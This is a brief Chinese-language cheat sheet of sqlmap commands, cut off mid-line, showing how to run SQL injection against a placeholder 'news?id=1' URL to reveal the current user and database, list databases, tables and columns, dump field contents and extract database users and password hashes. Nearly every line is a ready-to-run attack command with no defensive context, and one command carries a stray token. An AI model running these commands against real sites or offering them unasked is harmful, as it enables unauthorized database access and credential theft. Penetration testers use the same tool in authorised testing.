sqlmap工具
==========
sqlmap实例:
* `sqlmap -h` 帮助
* `sqlmap -u "http://url/news?id=1" --current-user` #获取当前用户名称
* `sqlmap -u "http://www.xxoo.com/news?id=1" --current-db` #获取当前数据库名称
* `sqlmap -u "http://www.xxoo.com/news?id=1" --tables -D "db_name"` #列表名
* `sqlmap -u "http://url/news?id=1" --columns -T "tablename" users-D "db_name" -v 0` #列字段
* `sqlmap -u "http://url/news?id=1" --dump -C "column_name" -T "table_name" -D "db_name" -v 0` #获取字段内容
* `sqlmap -u "http://url/news?id=1" --smart --level 3 --users` # smart智能 level 执行测试等级
* `sqlmap -u "http://url/news?id=1" --dbms "Mysql" --users` # dbms 指定数据库类型
* `sqlmap -u "http://url/news?id=1" --users` #列数据库用户
* `sqlmap -u "http://url/news?id=1" --dbs` #列数据库
* `sqlmap -u "http://url/news?id=1" --passwords` #数据库用户密码
* `sqlmap -u "http:/